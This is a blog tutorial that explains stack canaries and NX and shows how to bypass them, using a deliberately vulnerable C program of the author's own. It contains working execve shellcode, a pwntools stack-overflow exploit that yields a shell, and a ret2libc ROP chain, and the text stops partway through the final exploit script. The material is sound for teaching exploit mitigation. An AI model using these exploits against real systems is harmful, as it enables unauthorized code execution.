Understanding binary protections (and how to bypass them) with a dumb example
Hi! Long time no see, huh? I must apologize for my lousy posting schedule. In spite of the COVID-19 outbreak forcing us to stay home, it appears that I’ve never had less time to spare in my life. Well, let’s get to it.
Memory corruption issues often lead to pretty serious vulnerabilities. It is not uncommon for a stack or heap overflow, use-after-free, double free and others to lead to code execution. A few mitigations try to prevent this class of bugs from causing too much trouble, or at least to make the exploitation harder. Nevertheless, memory corruption is still a thing. Today we’ll talk about these mitigations, how they work, how effective they are and how they are commonly bypassed.
In the beginning…
Back in the day, memory corruption was a sure path towards code execution. There were no protections at all, and a simple stack overflow was enough to hijack the control flow.
Nowadays, when you compile a simple C program with GCC, the resulting binary comes protected as hell (the exact defaults depend on how your distribution configures GCC). Let’s check it out:
test.c
#include <stdio.h>
#define SIZE 16
void get_buffer(char *strout)
{
    printf("Please input a string (max length %d)\n", SIZE);
    gets(strout); //oh, shush
}
int main (int argc, char **argv)
{
    char buf[SIZE];
    get_buffer(buf);
    printf("The buffer is:\n%s",buf);
    return 0;
}
└────╼ gcc test.c -o test
└────╼ checksec --file=test
RELRO           STACK CANARY      NX            PIE
Full RELRO      Canary found      NX enabled    PIE enabled
It has full RELRO, stack canary, NX and PIE. Not to mention that Linux will, by default, provide ASLR at runtime. (A little lost in these terms? No worries, we’ll go over them in no time.)
So let’s rewind to the early days and deactivate all these memory protections. We’ll enable them later and see how they affect exploitation.
└────╼ gcc test.c -o test -fno-stack-protector -z execstack -no-pie -Wl,-z,norelro
└────╼ checksec --file=test
RELRO           STACK CANARY      NX            PIE
No RELRO        No canary found   NX disabled   No PIE
We compile our test file with no protections at all. I’ll also deactivate ASLR protection on my box:
└────╼ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Now we clearly have a stack overflow (or a stack out-of-bounds write, if you prefer). This program can easily be exploited for code execution. If you have no idea how to do this, this is a good place to start. In that blog post we cracked an OSCP-like stack overflow on Windows. Here we use Linux. The tools are different, but the principles are the same.
Keep in mind that this is a mock test program, which will be used for our examples today. It runs locally, but you can (use your imagination and) picture it as if it were a server reading our input, for example.
We now need to craft a shellcode (a piece of code which will give us a shell!) to trigger code execution.
Crafting our payload
First we need a shellcode. There’s no need to reinvent the wheel. Here is an x64 shellcode we can use (thank you, shell-storm!).
The shellcode’s assembly may be seen below. Although assembly can be tough to understand at times, I have added a few comments which might make it easier to grasp:
xor eax, eax                  ; Zeroes out eax (and therefore the whole rax)
mov rbx, 0xFF978CD091969DD1   ; "/bin/sh" followed by a zero byte, but negated, so the shellcode itself contains no '\0' that a string function would take as the end of the input
neg rbx                       ; Negates rbx, restoring "/bin/sh\0"
push rbx                      ; Pushes rbx to the stack
push rsp                      ; Pushes rsp (which now points to "/bin/sh") to the stack
pop rdi                       ; ...and pops it into rdi. Now rdi points to "/bin/sh" (1st argument: path)
cdq                           ; Sign-extends eax (zero) into edx, which zeroes rdx (3rd argument: envp = NULL)
push rdx                      ; Pushes zero to the stack (terminates the argv array)
push rdi                      ; Pushes rdi, the pointer to the "/bin/sh" string (argv[0])
push rsp                      ; Pushes rsp and
pop rsi                       ; pops it into rsi -> rsi = rsp, i.e. argv = {"/bin/sh", NULL} (2nd argument)
mov al, 0x3b                  ; execve syscall number (59)
syscall                       ; SYSCALLS!
Basically, it calls the execve syscall with “/bin/sh” as the program to run: execve("/bin/sh", {"/bin/sh", NULL}, NULL).
And if we assemble this right (or just copy it from shell-storm), we get the following bytes:
\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05
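If you want to double-check the negation trick from the comments, here is a small Python sketch (my own addition, not part of the exploit). It negates the constant loaded into rbx the same way neg does, and confirms that the shellcode bytes contain neither a null byte nor a newline (the character at which gets stops reading).

```python
import struct

# Shellcode bytes from shell-storm, as listed above.
SHELLCODE = (
    b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
    b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
)

RBX_IMM = 0xFF978CD091969DD1  # immediate operand of "mov rbx, ..."


def neg64(value: int) -> int:
    """Two's-complement negation on 64 bits, like the x86 neg instruction."""
    return (-value) & 0xFFFFFFFFFFFFFFFF


def stack_string(value: int) -> bytes:
    """Bytes that "push rbx" leaves in (little-endian) memory."""
    return struct.pack("<Q", value)


if __name__ == "__main__":
    print(stack_string(neg64(RBX_IMM)))              # b'/bin/sh\x00'
    print(b"\x00" in SHELLCODE, b"\n" in SHELLCODE)  # False False
    print(len(SHELLCODE))                            # 27
```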
As this is not a stack overflow tutorial, I won’t go into too much detail regarding the creation of our payload. Instead, I’ll keep it brief. If you feel lost, I strongly recommend you look into the OSCP-like stack overflow exploitation tutorial.
I’ll run the program and attach GDB to it. I’ll also put a breakpoint on main’s ret (or, rather, retq) instruction.
(gdb) disass main
Dump of assembler code for function main:
0x000000000040052d <+0>: push %rbp
0x000000000040052e <+1>: mov %rsp,%rbp
0x0000000000400531 <+4>: sub $0x20,%rsp
0x0000000000400535 <+8>: mov %edi,-0x14(%rbp)
0x0000000000400538 <+11>: mov %rsi,-0x20(%rbp)
0x000000000040053c <+15>: lea -0x10(%rbp),%rax
0x0000000000400540 <+19>: mov %rax,%rdi
0x0000000000400543 <+22>: callq 0x4004f7 <get_buffer>
0x0000000000400548 <+27>: lea -0x10(%rbp),%rax
0x000000000040054c <+31>: mov %rax,%rsi
0x000000000040054f <+34>: lea 0xc9(%rip),%rdi # 0x40061f
0x0000000000400556 <+41>: mov $0x0,%eax
0x000000000040055b <+46>: callq 0x4003f0 <printf@plt>
0x0000000000400560 <+51>: mov $0x0,%eax
0x0000000000400565 <+56>: leaveq
0x0000000000400566 <+57>: retq
(gdb) b *0x0000000000400566
Breakpoint 3 at 0x400566
Now I’ll send a bunch of “A”s to see if we can trigger anything.
Please input a string (max length 16)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
And our breakpoint hits. Let’s see what’s in the stack.
Thread 1 "test" hit Breakpoint 3, 0x0000000000400566 in main ()
(gdb) x/10x $rsp
0x7fffffffdda8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddb8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddc8: 0x41414141 0x41414141
So our payload is on the stack right before retq executes. retq is essentially pop rip: it pops the value at the top of the stack into the instruction pointer, and execution continues from there. Since we control part of the stack, we can put our shellcode somewhere in there. But how would we trigger it?
Since the stack address remains the same every time we run the program (ASLR is off), we can put the address of our shellcode right at 0x7fffffffdda8, the slot retq pops, and the shellcode itself right after it (at 0x7fffffffddb0). By doing some inspection (printing values on the stack), we find out that the region we control starts at 0x7fffffffdd90.
How do I know this? Well, I used a cyclic pattern. But another way is by mere inspection:
(gdb) x/10x $rsp-30
0x7fffffffdd8a: 0x00010040 0x41410000 0x41414141 0x41414141
0x7fffffffdd9a: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddaa: 0x41414141 0x41414141
(gdb) x/10x $rsp-24
0x7fffffffdd90: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffdda0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddb0: 0x41414141 0x41414141
(gdb) x/10x $rsp-25
0x7fffffffdd8f: 0x41414100 0x41414141 0x41414141 0x41414141
0x7fffffffdd9f: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffddaf: 0x41414141 0x41414141
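By inspection, we see that at the moment retq executes, the stack pointer points to position 24 of our buffer. That matches the disassembly: buf lives at rbp-0x10, so 16 bytes of buffer plus 8 bytes of saved RBP come before the return address.
So we need 24 bytes of padding. This is what our payload will look like: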
[24 bytes padding] + [address to our shellcode (0x7fffffffddb0)] + [shellcode]
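As an alternative to eyeballing the stack, a cyclic (de Bruijn) pattern gives the offset directly: every 4-byte window of the pattern is unique, so whatever bytes end up at $rsp when retq executes identify their own position in the input. pwntools provides cyclic() and cyclic_find() for this, and peda has a pattern command. The Python sketch below is a self-contained version of the same idea (the helper names mirror pwntools’, but this is not its implementation), with a simulated crash standing in for the real one.

```python
from functools import lru_cache

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


@lru_cache(maxsize=None)
def de_bruijn(n: int = 4) -> bytes:
    """De Bruijn sequence over ALPHABET: every n-byte window appears at most once."""
    k = len(ALPHABET)
    a = [0] * (k * n)
    seq = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(ALPHABET[i] for i in seq)


def cyclic(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the pattern, to be sent as input."""
    return de_bruijn(n)[:length]


def cyclic_find(chunk: bytes, n: int = 4) -> int:
    """Offset of the first n bytes of `chunk` (e.g. what x/gx $rsp shows) in the pattern."""
    return de_bruijn(n).find(chunk[:n])


if __name__ == "__main__":
    pattern = cyclic(64)
    # Simulated crash: 16 bytes of buf + 8 bytes of saved rbp come first,
    # so the qword retq pops is the one 24 bytes into our input.
    seen_at_rsp = pattern[24:32]
    print(cyclic_find(seen_at_rsp))  # 24
```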
Using python to build our payload and print it, or send it to a file, or call the program directly, we’d have this:
payload = b"A"*24 + b"\xb0\xdd\xff\xff\xff\x7f\x00\x00\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
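The address bytes in the payload may look scrambled, but they are just 0x7fffffffddb0 written in little-endian order, the byte order x86-64 uses in memory. A minimal sketch with Python’s struct module (no pwntools needed) builds the same payload; the constant and function names are mine.

```python
import struct

SHELLCODE = (
    b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb"
    b"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
)
RET_ADDR = 0x7fffffffddb0  # where the shellcode sits on the author's stack (ASLR off)
OFFSET = 24                # 16-byte buf + 8-byte saved rbp


def build_payload(ret_addr: int, shellcode: bytes, offset: int = OFFSET) -> bytes:
    # "<Q" = little-endian unsigned 64-bit integer.
    return b"A" * offset + struct.pack("<Q", ret_addr) + shellcode


if __name__ == "__main__":
    payload = build_payload(RET_ADDR, SHELLCODE)
    print(payload[24:32])  # b'\xb0\xdd\xff\xff\xff\x7f\x00\x00'
    print(len(payload))    # 59
```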
I’ll write a python “exploit” for this using pwntools:
from pwn import *
context(arch='amd64', os='linux')
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
payload = b"A"*24 + p64(0x7fffffffddb0) + shellcode   # padding + return address + shellcode
io = process("/home/danilo/tmp/test")
io.readline()            # consume "Please input a string (max length 16)"
io.sendline(payload)
io.interactive()
What this code does is open the target program, read the “Please input a string (max length 16)” line, send our payload and open an interactive channel with the program. The result is a shell:
└────╼ python3 exploit.py
[+] Starting local process '/home/danilo/tmp/test': pid 20836
[*] Switching to interactive mode
The buffer is:
$ ls
exploit.py test test.c
$ pwd
/home/danilo/tmp
$
Great! So upon finding a buffer overflow, it is relatively easy to exploit it into code execution. Or at least it was a couple of decades ago. Now let’s enable the protections and see how it goes.
In the next few sections I’ll present each memory corruption mitigation. They are not in any specific order.
Stack Canary
How cute are canaries?
Well, very cute. According to Wikipedia, coal miners used canaries to detect toxic gases, such as carbon monoxide, in the workplace. “Canary” is also slang for a snitch: an informant who sings to the police. And stack canaries are great at mitigating stack overflow vulnerabilities.
The issue with the program we wrote in the previous section was a stack overflow. That means we had a buffer on our stack into which we could write an arbitrary amount of data, even beyond the designated size of the buffer. An adversary may overwrite other data in memory, such as the return address, and hijack the control flow, leading to arbitrary code execution.
The stack canary is designed to detect whether the return address was overwritten, making it harder to hijack the control flow.
It works very simply, but also very elegantly. An 8-byte semi-random value is placed on the stack between the local buffers and the return address (see the representation below). Before the function returns, it checks whether the canary has been altered. If it hasn’t, execution continues gracefully. If it has, the program aborts. I said semi-random because not all bytes are random: there are 7 random bytes and a null byte ('\0'). If an adversary has an out-of-bounds write, he or she will have to overwrite the canary to get to the return address. The null byte was chosen because it is the string terminator, so an adversary should have trouble writing it through string functions such as strcpy, which stop copying at the first null byte. And in case of a memory leak through a printed string, the null byte acts as a terminator before the rest of the canary can be printed.
+-----------------------+
| |
| ... |
| |
+-----------------------+
| |
| |
| |
| Vulnerable buffer |
| |
| |
| |
+-----------------------+
| |
| Stack canary |
+-----------------------+
| |
| Return address |
+-----------------------+
| |
| ... |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
+-----------------------+
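To make the mechanism concrete, here is a toy Python model of the check (an illustration under simplifying assumptions, not what GCC actually emits): the frame is just [buffer][canary][return address], the saved rbp is left out, and the write mimics gets() without bounds checking. The return address 0x401000 is made up.

```python
import os
import struct

BUF_SIZE = 16  # SIZE in test.c


def make_canary() -> bytes:
    # 7 random bytes plus one null byte. On little-endian x86-64 the null is
    # the lowest-addressed byte, i.e. the first one right after the buffer.
    return b"\x00" + os.urandom(7)


def build_frame(canary: bytes, ret_addr: int) -> bytearray:
    # Simplified frame, low to high addresses: [buf][canary][return address].
    return bytearray(BUF_SIZE) + bytearray(canary) + bytearray(struct.pack("<Q", ret_addr))


def unchecked_write(frame: bytearray, data: bytes) -> None:
    # Like gets(): copies with no bounds check (the trailing null byte that
    # gets() appends is omitted here).
    n = min(len(data), len(frame))
    frame[:n] = data[:n]


def epilogue(frame: bytearray, canary: bytes) -> int:
    # Same idea as the mov/xor/je sequence right before leave; ret.
    if bytes(frame[BUF_SIZE:BUF_SIZE + 8]) != canary:
        raise RuntimeError("*** stack smashing detected ***")
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]


if __name__ == "__main__":
    canary = make_canary()
    frame = build_frame(canary, 0x401000)
    unchecked_write(frame, b"A" * 16)   # fits in the buffer
    print(hex(epilogue(frame, canary)))  # 0x401000
    unchecked_write(frame, b"A" * 40)   # runs over the canary and the return address
    try:
        epilogue(frame, canary)
    except RuntimeError as err:
        print(err)                       # *** stack smashing detected ***
```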
Let’s recompile our binary, now removing the -fno-stack-protector option (this GCC enables the stack protector by default, as the first checksec output showed):
gcc test.c -o test -z execstack -no-pie -Wl,-z,norelro
Now disassemble with gdb:
└────╼ gdb ./test
(gdb) disass main
Dump of assembler code for function main:
0x000000000040059d <+0>: push %rbp
0x000000000040059e <+1>: mov %rsp,%rbp
0x00000000004005a1 <+4>: sub $0x30,%rsp
0x00000000004005a5 <+8>: mov %edi,-0x24(%rbp)
0x00000000004005a8 <+11>: mov %rsi,-0x30(%rbp)
0x00000000004005ac <+15>: mov %fs:0x28,%rax
0x00000000004005b5 <+24>: mov %rax,-0x8(%rbp)
0x00000000004005b9 <+28>: xor %eax,%eax
0x00000000004005bb <+30>: lea -0x20(%rbp),%rax
0x00000000004005bf <+34>: mov %rax,%rdi
0x00000000004005c2 <+37>: callq 0x400567 <get_buffer>
0x00000000004005c7 <+42>: lea -0x20(%rbp),%rax
0x00000000004005cb <+46>: mov %rax,%rsi
0x00000000004005ce <+49>: lea 0xda(%rip),%rdi # 0x4006af
0x00000000004005d5 <+56>: mov $0x0,%eax
0x00000000004005da <+61>: callq 0x400460 <printf@plt>
0x00000000004005df <+66>: mov $0x0,%eax
0x00000000004005e4 <+71>: mov -0x8(%rbp),%rdx
0x00000000004005e8 <+75>: xor %fs:0x28,%rdx
0x00000000004005f1 <+84>: je 0x4005f8 <main+91>
0x00000000004005f3 <+86>: callq 0x400450 <__stack_chk_fail@plt>
0x00000000004005f8 <+91>: leaveq
0x00000000004005f9 <+92>: retq
End of assembler dump.
Here we see the assembly code of the main function. Note these lines specifically:
...
0x00000000004005ac <+15>: mov %fs:0x28,%rax
0x00000000004005b5 <+24>: mov %rax,-0x8(%rbp)
...
0x00000000004005e4 <+71>: mov -0x8(%rbp),%rdx
0x00000000004005e8 <+75>: xor %fs:0x28,%rdx
0x00000000004005f1 <+84>: je 0x4005f8 <main+91>
0x00000000004005f3 <+86>: callq 0x400450 <__stack_chk_fail@plt>
0x00000000004005f8 <+91>: leaveq
0x00000000004005f9 <+92>: retq
In <+15> and <+24>, it reads the canary from %fs:0x28 (thread-local storage) and stores it at %rbp-0x8. Note that the canary is picked once, when the program starts, so it remains the same for all functions within the program.
Later on, at <+71> and <+75>, it loads the stored canary into %rdx and XORs it with the original value; the result is zero only if both are equal. If so (<+84>), meaning the canary hasn’t been altered, it jumps to <+91> and leaves the function gracefully. If not, the __stack_chk_fail function is called, causing the program to abort:
└────╼ ./test
Please input a string (max length 16)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The buffer is:
*** stack smashing detected ***: <unknown> terminated
Aborted (core dumped)
This mitigation kills the vulnerability here. However, note that the canary is not a silver bullet (or a silver shield??). It only detects writes that run over the canary; anything before the canary, such as other local variables, can still be overwritten. It is also only effective against out-of-bounds writes on the stack. There are many other memory corruption bug classes, such as use-after-free, arbitrary read, arbitrary write, double free, and others. Moreover, the canary could be leaked, but that would depend on a second vulnerability.
In summary, canaries offer good protection against stack overflow vulnerabilities. Leaking the canary is a way to bypass this mitigation, but it depends on another vulnerability, and the null byte makes such leaks harder for the most part. However, canaries do not protect against other memory corruption vulnerabilities.
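The null byte’s effect on leaks is easy to see with a short Python sketch. It assumes a hypothetical bug where the 16-byte buffer gets filled with no terminating null and is then printed with %s, and it places the canary right after the buffer for simplicity (in our binary, buf at rbp-0x20 and the canary at rbp-0x8 leave an 8-byte gap in between). The canary values are made up.

```python
CANARY_WITH_NULL = b"\x00\x8f\x3a\x51\xc2\x17\x6e\xd4"     # made-up, glibc-style
CANARY_WITHOUT_NULL = b"\x9b\x8f\x3a\x51\xc2\x17\x6e\xd4"  # hypothetical, for contrast


def read_c_string(memory: bytes, start: int = 0) -> bytes:
    """What printf("%s", ...) would print: bytes up to the first null."""
    end = memory.find(b"\x00", start)
    return memory[start:] if end == -1 else memory[start:end]


def stack_after_buffer(canary: bytes) -> bytes:
    # 16 unterminated "A"s, then the canary, then a saved rbp
    # (zeroed here only so the string eventually ends).
    return b"A" * 16 + canary + b"\x00" * 8


if __name__ == "__main__":
    print(read_c_string(stack_after_buffer(CANARY_WITH_NULL)))           # only the A's
    print(len(read_c_string(stack_after_buffer(CANARY_WITHOUT_NULL))))  # 24: canary leaked
```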
NX
The NX (no-execute) bit is used to mark regions of memory as non-executable. There’s no reason for the stack or heap to be executed, for instance, since all the code is in the .TEXT region. With this protection enabled, adversaries need to get more creative to bypass the mitigation.
This mitigation also makes our payload useless, since our shellcode runs from the stack. If we send it now, the program dies with exit code -11 (SIGSEGV). But is there any bypass?
Ret2libc
Well, yes. NX means we can’t inject new code into the program, but we can conveniently reuse code that is already there.
The return-to-libc technique is based on overwriting return addresses so they point to functions or gadgets in libc. Libc is enormous, and there are gadgets to do pretty much anything. For instance, there is the execve function, a libc wrapper that sets things up and issues the same execve syscall our shellcode used.
But exploiting gets a bit trickier.
First, we deactivate the canary again and activate the NX protection:
gcc test.c -o test -fno-stack-protector -no-pie -Wl,-z,norelro
To craft our new payload, we’ll be using GDB with the peda plugin and pwntools with Python 3.
The goal here is to reuse existing code to get where we want. We need to call the execve syscall. I have started the program and attached gdb to it. I’ll use disass execve to get the address of the execve libc wrapper:
gdb-peda$ disass execve
Dump of assembler code for function execve:
0x00007ffff7ac6c00 <+0>: mov eax,0x3b
0x00007ffff7ac6c05 <+5>: syscall
0x00007ffff7ac6c07 <+7>: cmp rax,0xfffffffffffff001
0x00007ffff7ac6c0d <+13>: jae 0x7ffff7ac6c10 <execve+16>
0x00007ffff7ac6c0f <+15>: ret
0x00007ffff7ac6c10 <+16>: mov rcx,QWORD PTR [rip+0x306251] # 0x7ffff7dcce68
0x00007ffff7ac6c17 <+23>: neg eax
0x00007ffff7ac6c19 <+25>: mov DWORD PTR fs:[rcx],eax
0x00007ffff7ac6c1c <+28>: or rax,0xffffffffffffffff
0x00007ffff7ac6c20 <+32>: ret
End of assembler dump.
Here we see that the address of the execve function is 0x00007ffff7ac6c00. We need to pass “/bin/bash” as the argument to that syscall so it spawns a shell (which is our goal here). To do that, rdi must point to the “/bin/bash” string. In addition, rsi should be zero. You may be wondering how I know that. Well, I checked the Linux system call table: execve takes the path in rdi, argv in rsi and envp in rdx. Strictly speaking, rdx should also be zero or a valid pointer; our chain does not set it and relies on whatever value rdx happens to hold when main returns.
To correctly set the values for these two registers we need gadgets. Gadgets are short sequences of existing instructions, usually ending in ret, which we can chain together to get the desired effect.
We need rdi to point to “/bin/bash”. We can put the string on the stack and use a pop rdi; ret gadget to load its address into rdi.
Fortunately, libc is gigantic and has enough gadgets to do anything we want, and peda makes it very easy to find them. First, let’s see what our payload will look like:
padding + pop rdi; ret + rdi value (pointer to "/bin/bash" string) + pop rsi; ret + rsi value (zero!) + execve addr + "/bin/bash"
It starts with the 24-byte padding. Then we set rdi to point to the “/bin/bash” string and zero rsi out. After that comes the execve address and, finally, the “/bin/bash” string itself. Each gadget ends in ret, which pops the next address off the stack, so the chain runs from top to bottom.
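Here is a toy Python model of how the chain unwinds, just to make the ret-pops-the-next-address idea concrete. It only knows the two gadgets we use and stops when it reaches anything else (here, execve); the addresses are the ones from this post and only make sense on the author’s box with ASLR off. It also predicts where the string should land: five 8-byte slots precede it, so it sits 40 bytes above the $rsp value seen at main’s retq (0x7fffffffdda8).

```python
import struct

# Addresses from this post (author's box, ASLR disabled).
POP_RDI_RET = 0x00007ffff7a035bf
POP_RSI_RET = 0x00007ffff7a05eea
EXECVE = 0x00007ffff7ac6c00
RSP_AT_MAIN_RET = 0x7fffffffdda8  # $rsp when main's retq executes


def pack64(value: int) -> bytes:
    return struct.pack("<Q", value)


def walk_chain(stack: bytes) -> dict:
    """Toy model: each ret pulls the next gadget address off the stack."""
    regs = {"rdi": None, "rsi": None}
    sp = 0

    def pop() -> int:
        nonlocal sp
        (value,) = struct.unpack_from("<Q", stack, sp)
        sp += 8
        return value

    rip = pop()  # main's retq
    while rip in (POP_RDI_RET, POP_RSI_RET):
        reg = "rdi" if rip == POP_RDI_RET else "rsi"
        regs[reg] = pop()  # pop rdi / pop rsi
        rip = pop()        # ret
    regs["rip"] = rip
    return regs


if __name__ == "__main__":
    binsh_addr = RSP_AT_MAIN_RET + 5 * 8
    chain = (pack64(POP_RDI_RET) + pack64(binsh_addr) + pack64(POP_RSI_RET)
             + pack64(0) + pack64(EXECVE) + b"/bin/bash")
    regs = walk_chain(chain)
    print(hex(regs["rdi"]), regs["rsi"], hex(regs["rip"]))
    # 0x7fffffffddd0 0 0x7ffff7ac6c00
```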
To find our gadgets, we’ll use peda:
gdb-peda$ ropsearch "pop rdi; ret" libc
Searching for ROP gadget: 'pop rdi; ret' in: libc ranges
0x00007ffff7a035bf : (b'5fc3') pop rdi; ret
0x00007ffff7a044ae : (b'5fc3') pop rdi; ret
0x00007ffff7a04c37 : (b'5fc3') pop rdi; ret
0x00007ffff7a04cbe : (b'5fc3') pop rdi; ret
0x00007ffff7a05bd2 : (b'5fc3') pop rdi; ret
0x00007ffff7a05f4b : (b'5fc3') pop rdi; ret
0x00007ffff7a072e7 : (b'5fc3') pop rdi; ret
0x00007ffff7a077ce : (b'5fc3') pop rdi; ret
0x00007ffff7a07ce6 : (b'5fc3') pop rdi; ret
0x00007ffff7a08260 : (b'5fc3') pop rdi; ret
0x00007ffff7a088b9 : (b'5fc3') pop rdi; ret
0x00007ffff7a08b81 : (b'5fc3') pop rdi; ret
0x00007ffff7a09647 : (b'5fc3') pop rdi; ret
0x00007ffff7a0a677 : (b'5fc3') pop rdi; ret
0x00007ffff7a0b79c : (b'5fc3') pop rdi; ret
0x00007ffff7a0be84 : (b'5fc3') pop rdi; ret
0x00007ffff7a0ca1f : (b'5fc3') pop rdi; ret
0x00007ffff7a0d0cc : (b'5fc3') pop rdi; ret
0x00007ffff7a0dbcc : (b'5fc3') pop rdi; ret
0x00007ffff7a0e198 : (b'5fc3') pop rdi; ret
0x00007ffff7a0e261 : (b'5fc3') pop rdi; ret
0x00007ffff7a0ef59 : (b'5fc3') pop rdi; ret
0x00007ffff7a0f204 : (b'5fc3') pop rdi; ret
0x00007ffff7a102d3 : (b'5fc3') pop rdi; ret
0x00007ffff7a10307 : (b'5fc3') pop rdi; ret
--More--(25/489)
It has found 489 occurrences of “pop rdi; ret” in libc which we can use. Any one will do. I’ll use 0x00007ffff7a035bf to craft my payload.
Now the other gadget:
gdb-peda$ ropsearch "pop rsi; ret" libc
Searching for ROP gadget: 'pop rsi; ret' in: libc ranges
0x00007ffff7a05eea : (b'5ec3') pop rsi; ret
0x00007ffff7a12097 : (b'5ec3') pop rsi; ret
0x00007ffff7a229da : (b'5ec3') pop rsi; ret
0x00007ffff7a40854 : (b'5ec3') pop rsi; ret
0x00007ffff7a461b3 : (b'5ec3') pop rsi; ret
0x00007ffff7a4d1c5 : (b'5ec3') pop rsi; ret
0x00007ffff7a5e8a4 : (b'5ec3') pop rsi; ret
0x00007ffff7a60e93 : (b'5ec3') pop rsi; ret
0x00007ffff7a60ecb : (b'5ec3') pop rsi; ret
0x00007ffff7a62ede : (b'5ec3') pop rsi; ret
0x00007ffff7a640d4 : (b'5ec3') pop rsi; ret
0x00007ffff7a641b8 : (b'5ec3') pop rsi; ret
0x00007ffff7a64fc9 : (b'5ec3') pop rsi; ret
0x00007ffff7a66fa6 : (b'5ec3') pop rsi; ret
0x00007ffff7a66ff1 : (b'5ec3') pop rsi; ret
0x00007ffff7a69c62 : (b'5ec3') pop rsi; ret
0x00007ffff7a6a6e0 : (b'5ec3') pop rsi; ret
0x00007ffff7a6aa17 : (b'5ec3') pop rsi; ret
0x00007ffff7a6aac0 : (b'5ec3') pop rsi; ret
0x00007ffff7a6aaf6 : (b'5ec3') pop rsi; ret
0x00007ffff7a6b32f : (b'5ec3') pop rsi; ret
0x00007ffff7a6bd09 : (b'5ec3') pop rsi; ret
0x00007ffff7a6c138 : (b'5ec3') pop rsi; ret
0x00007ffff7a6e5ee : (b'5ec3') pop rsi; ret
0x00007ffff7a6f246 : (b'5ec3') pop rsi; ret
--More--(25/149)
149 occurrences. Again, any one will do. I’ll use 0x00007ffff7a05eea.
Ok, so we refine our stack payload:
24-byte padding + 0x00007ffff7a035bf + STACK ADDRESS FOR "/bin/bash" STRING + 0x00007ffff7a05eea + 0 + 0x00007ffff7ac6c00 + "/bin/bash"
All that’s left to do is find out the stack address of “/bin/bash”. Gdb can do that for us. I’ll prepare the payload with some garbage in place of the stack address, send it, and see where the string lands. Check the “exploit” out:
from pwn import *
context(arch='amd64', os='linux')
addr_execve = 0x00007ffff7ac6c00        # execve
addr_poprdi_ret = 0x00007ffff7a035bf    # pop rdi; ret
addr_poprsi_ret = 0x00007ffff7a05eea    # pop rsi; ret
addr_binsh_str = 0xdeadbeefdeadbeef     # placeholder until we know where the string lands
payload = b"A"*24 + pack(addr_poprdi_ret) + pack(addr_binsh_str) + pack(addr_poprsi_ret) + pack(0) + pack(addr_execve) + b"/bin/bash"
io = process("/home/danilo/tmp/test")
input()  # This will stop the program in time so we can attach gdb.
io.readline()
io.sendline(payload)
io.interactive()
We run it and attach gdb, with a breakpoint on main’s return instruction.
gdb-peda$ disass main
Dump of assembler code for function main:
0x000000000040052d <+0>: push rbp
0x000000000040052e <+1>: mov rbp,rsp
0x0000000000400531 <+4>: sub rsp,0x20
0x0000000000400535 <+8>: mov DWORD PTR [rbp-0x14],edi
0x0000000000400538 <+11>: mov QWORD PTR [rbp-0x20],rsi
0x000000000040053c <+15>: lea rax,[rbp-0x10]
0x0000000000400540 <+19>: mov rdi,rax
0x0000000000400543 <+22>: call 0x4004f7 <get_buffer>
0x0000000000400548 <+27>: lea rax,[rbp-0x10]
0x000000000040054c <+31>: mov rsi,rax
0x000000000040054f <+34>: lea rdi,[rip+0xc9] # 0x40061f
0x0000000000400556 <+41>: mov eax,0x0
0x000000000040055b <+46>: call 0x4003f0 <printf@plt>
0x0000000000400560 <+51>: mov eax,0x0
0x0000000000400565 <+56>: leave
0x0000000000400566 <+57>: ret
End of assembler dump.
gdb-peda$ br *0x0000000000400566
Breakpoint 1 at 0x400566
gdb-peda$ c
Thread 1 "test" hit Breakpoint 1, 0x0000000000400566 in main ()
gdb-peda$ x/10x $rsp
0x7fffffffdda8: 0x00007ffff7a035bf 0xdeadbeefdeadbeef
0x7fffffffddb8: 0x00007ffff7a05eea 0x0000000000000000
0x7fffffffddc8: 0x00007ffff7ac6c00 0x7361622f6e69622f
0x7fffffffddd8: 0xd1b02fd71f9c0068 0x0000000000400410
0x7fffffffdde8: 0x00007fffffffde80 0x0000000000000000
Looks like we found our target: the string starts right after the execve address, at 0x7fffffffddd0:
gdb-peda$ x/s 0x7fffffffddd0
0x7fffffffddd0: "/bin/bash"
So our final exploit is:
from pwn import *
context(arch='amd64', os='linux')
addr_execve = 0x00007ffff7ac6c00        # execve
addr_poprdi_ret = 0x00007ffff7a035bf    # pop rdi; ret
addr_poprsi_ret = 0x00007ffff7a05eea    # pop rsi; ret
addr_binsh_str = 0x7fffffffddd0         # where "/bin/bash" lands on the stack
payload = b"A"*24 + pack(addr_poprdi_ret) + pack(addr_binsh_str) + pack(addr_poprsi_ret) + pack(0) + pack(addr_execve) + b"/bin/bash"
io = process("/home/danilo/tmp/test")
